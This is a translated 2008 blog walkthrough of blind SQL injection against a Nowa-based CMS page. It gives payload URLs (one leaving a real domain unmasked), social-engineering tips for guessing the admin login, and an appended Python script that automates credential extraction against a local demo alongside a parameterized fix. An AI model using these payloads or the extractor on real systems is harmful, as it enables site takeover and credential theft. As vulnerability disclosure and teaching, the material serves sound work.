First, a complaint. I came to a strange city (Shanghai). It was easy to find a company to work for, and in that company I was responsible for security. I was not doing security checks every day; I started with the server and then the whole site. I remember clearly that I worked there for eight days, and in those eight days I carefully and seriously fixed things until there were no known vulnerabilities, yet I still ended up worrying. I don't know whether the problem was mine or something else. The company manager asked me for help, but I could not stay at the company because of my XXXX. Unexpectedly, when I went back to my friend's house that night, he said that since I had done the company's security I should know exactly what the problem was, but I did not. It is also strange that the server seemed to run into a problem at that time, and an email was sent to the "good guys". There were still security problems! I am not complaining about anyone today; I can only blame myself for being silly! To sum up, I really was stupid! I just want to say one thing here: thank you for your book, I won't forget it, but I also want to say it in front of my colleagues across the Internet: be honest!
Recently more and more users are building their sites on whole-site systems found online. The whole-site system examined here is modified from Nowa 0.94. Nowa-based systems are far from the only ones circulating online, and I will not list the others here: the core is the same, only the added functions differ. In terms of security, the only publicly known vulnerability in Nowa-based systems so far is the upload vulnerability. This article covers a SQL injection vulnerability in these Nowa-based modifications that, as far as I know, has not been reported before. The injection problem was simply never handled when the program was modified. That cannot be blamed on me; who told the programmers not to pay attention to security?
1. Determine the injection point
We test against the official website, because the version distributed elsewhere may not be the latest, and that would make the article's findings inaccurate. First submit (spaces are sent as %20):
http://***.com/view.asp?action=Art&art_id=70 and 1=1
then submit
http://***.com/view.asp?action=Art&art_id=70 and 1=2
Standard injection-point detection with and 1=1 / and 1=2 (the two screenshots show the two responses) tells us the page renders normally in the first case and not in the second, so this program has a SQL injection point. Because the Nowa-based modifications are all built on an Access database, we can also determine the database type of this program directly.
2. Query the database tables
Being lazy, I first tried to borrow NBSI for the injection. I don't know whether NBSI is simply too powerful to be used on such small game, but it could not detect any of the injection points I had found! Amazing; NBSI really did me a "favour". So I had to go back to manual injection. First, check whether the database has an admin table. Construct and submit:
http://***.com/view.asp?action=Art&art_id=70 and 0<(select count(*) from admin)
Most programs name their administrator table admin or adminuser, so we only need to grasp the program author's habits. If the table does not exist the query itself errors and the page is abnormal; here the page returns normally after the statement is submitted, so we can determine that the admin table exists in the database. We only need the administrator account and password, so the other tables in the database can be ignored.
3. Guess database fields
To cut down on trouble and unnecessary guessing, we should first collect some information about the target website, for example the administrator's QQ number and online nickname, because people usually choose an account and password that is easy to remember so they do not forget it. The editor's details and the administrator's QQ number could not be found on functional pages such as the article pages, so I had to look for the user name in the BBS. Fortunately, the user name "Tian Chen" turned up in the BBS, so when guessing the admin account we can try the Chinese name in pinyin or its initials. (A pretty girl once showed me her name and birthday on MSN; never underestimate the importance of social engineering.)
Now let's look at the administrator fields. First I guessed the name field and submitted:
http://***.com/view.asp?action=Art&art_id=70 and 1=(select count(*) from admin where len(name)>0)
(No! It is not the name field.) The page returned abnormally after the statement was submitted, which confirms that there is no name field in the admin table. I had to think about how to guess further. Since name is wrong, try admin_name. Reconstruct the statement:
http://***.com/view.asp?action=Art&art_id=70 and 1=(select count(*) from admin where len(admin_name)>0)
(Could it be this one? One step closer!) After the statement is submitted the page returns normally, so this sub-statement is right. Note that 1=(select count(*) ...) only holds when the admin table has exactly one row; if a site has several administrators, use 0<(select count(*) ...) as in step 2 instead.
Next we guess the password field. Given the naming seen above, the password field is presumably admin_password, so submit:
http://***.com/view.asp?action=Art&art_id=70 and 1=(select count(*) from admin where len(admin_password)>0)
The page displays normally. Right? Hahaha
At this point the field guessing is almost done! (What? Where are the account and password? Are you stupid?) Guessing the account and password is even more troublesome and time-consuming. First let's guess the length of the account. Assume the nickname "Tian Chen" obtained earlier is also the administrator account. There are two possibilities: one is the pinyin, tianchen, or an abbreviation such as tinzn; the other is that the Chinese characters themselves are stored and have to be guessed through their character codes. First try the pinyin possibility. If it is the abbreviated form, admin_name would be 5 characters long, so start by submitting:
http://***.com/view.asp?action=Art&art_id=70 and 1=(select count(*) from admin where len(admin_name)>5)
The page does not display normally. Then submit
http://fj126.com/view.asp?action=Art&art_id=70 and 1=(select count(*) from admin where len(admin_name)>4)
This time the page is normal! Then submit
http://***.com/view.asp?action=Art&art_id=70 and 1=(select count(*) from admin where len(admin_name)=5)
and the page is normal again, so we can determine that the length of admin_name is 5. The account length is settled, but we still do not know the length of the password. According to the information collected, the password is stored as a 16-character MD5 hash, so we guess a password length of 16. Submit:
http://***.com/view.asp?action=Art&art_id=70 and 1=(select count(*) from admin where len(admin_password)=16)
As expected, the page displays normally. So the account is 5 characters long and the password is 16. I will not list the character-by-character guessing of the account and password here. The administrator account confirmed after the social-engineering guess is tinzn, and the password is indeed a 16-character MD5 hash. Throughout the process you can also use CSC for the injection tests.
4. Summary
There are several injectable pages in the whole-site program, caused by the lack of SQL injection filtering on the functional pages that were added to the whole-site system online. If you are using this program, you can use a general-purpose anti-injection script, or better, validate that art_id is numeric and pass it to the database as a parameter rather than concatenating it into the query. Although the MD5 hash still has to be brute-forced, if you have really offended someone they do not even need to crack it to take your website; network security is a very important part of running a site, and I hope you will not underestimate it. If there are errors in the article above, please point them out, and if you have any questions, contact me through my blog or by email.
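As an added example (not code from the original article or from Nowa), the whole procedure above, from detecting the injection point through confirming the admin table, its fields and the lengths, plus the character-by-character extraction the article skips and the parameterized query the summary recommends, re-created locally in Python. An in-memory SQLite database stands in for the Access file, vulnerable_view() and safe_view() stand in for view.asp?action=Art&art_id=..., and the admin row (tinzn plus a constructed 16-character MD5) is invented for the demo.

```python
"""
Added example, not code from the original article or from Nowa. Everything here is
constructed: SQLite stands in for Access, vulnerable_view()/safe_view() stand in for
view.asp, and the admin row is invented. A page handler returns True when the article
"renders normally" and False when the response is abnormal (no row, or a SQL error).
"""
import hashlib
import sqlite3

ADMIN_NAME = "tinzn"                                      # constructed, 5 characters
ADMIN_PASSWORD = hashlib.md5(b"demo").hexdigest()[8:24]   # middle 16 hex digits: the "MD5 16-bit" form


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    # Access has len(); SQLite only has length(). Register the Access name so the
    # article's payloads can be sent unchanged.
    con.create_function("len", 1, lambda s: None if s is None else len(s))
    con.execute("CREATE TABLE article (art_id INTEGER PRIMARY KEY, title TEXT)")
    con.execute("CREATE TABLE admin (admin_name TEXT, admin_password TEXT)")
    con.execute("INSERT INTO article VALUES (70, 'constructed article')")
    con.execute("INSERT INTO admin VALUES (?, ?)", (ADMIN_NAME, ADMIN_PASSWORD))
    return con


def vulnerable_view(con, art_id: str) -> bool:
    """Models the Nowa-style page: art_id is concatenated straight into the SQL text."""
    sql = "SELECT title FROM article WHERE art_id=" + art_id
    try:
        return con.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # database error page: the "abnormal" response


def safe_view(con, art_id: str) -> bool:
    """The fix: check the type, then bind the value; input is never parsed as SQL."""
    try:
        art_id_num = int(art_id)
    except ValueError:
        return False
    row = con.execute("SELECT title FROM article WHERE art_id=?", (art_id_num,)).fetchone()
    return row is not None


# Attacker side: one boolean oracle, then the steps of the article in order.
def oracle(page, con, condition: str) -> bool:
    """Does 'art_id=70 and <condition>' still render the article?"""
    return page(con, "70 and " + condition)


def detect_injection(page, con) -> bool:
    """Step 1: 'and 1=1' renders but 'and 1=2' does not."""
    return oracle(page, con, "1=1") and not oracle(page, con, "1=2")


def table_exists(page, con, table: str) -> bool:
    """Step 2: and 0<(select count(*) from admin)."""
    return oracle(page, con, f"0<(select count(*) from {table})")


def column_exists(page, con, table: str, column: str) -> bool:
    """Step 3: and 1=(select count(*) from admin where len(col)>0); False on a SQL error."""
    return oracle(page, con, f"1=(select count(*) from {table} where len({column})>0)")


def guess_length(page, con, table: str, column: str, max_len: int = 64) -> int:
    """Binary search generalising the article's len()>5 / len()>4 / len()=5 probes."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(page, con, f"1=(select count(*) from {table} where len({column})>{mid})"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def guess_value(page, con, table: str, column: str, length: int) -> str:
    """The step the article leaves out: recover each character by binary search on its
    code. SQLite: unicode(substr(col,i,1)); on Access the same probe is asc(mid(col,i,1))."""
    chars = []
    for i in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII covers a login name and a hex MD5
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"1=(select count(*) from {table} where unicode(substr({column},{i},1))>{mid})"
            if oracle(page, con, probe):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


def run_attack(page, con):
    """Drive the whole procedure against one page handler; None if there is no injection."""
    if not detect_injection(page, con) or not table_exists(page, con, "admin"):
        return None
    found = {}
    for column in ("admin_name", "admin_password"):
        if column_exists(page, con, "admin", column):
            n = guess_length(page, con, "admin", column)
            found[column] = guess_value(page, con, "admin", column, n)
    return found


if __name__ == "__main__":
    print("vulnerable:", run_attack(vulnerable_view, build_db()))  # recovers the admin row
    print("patched:   ", run_attack(safe_view, build_db()))        # None
```

Each probe costs one request, so the binary searches above recover a 5-character name and a 16-character hash in a few hundred requests instead of thousands; against the patched handler the very first and 1=1 probe fails because the non-numeric art_id is rejected before any SQL is built.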
This article from the csdn blog, reproduced please indicate the source: http://blog.csdn.net/wufeng4552/archive/2008/12/05/3449988.aspx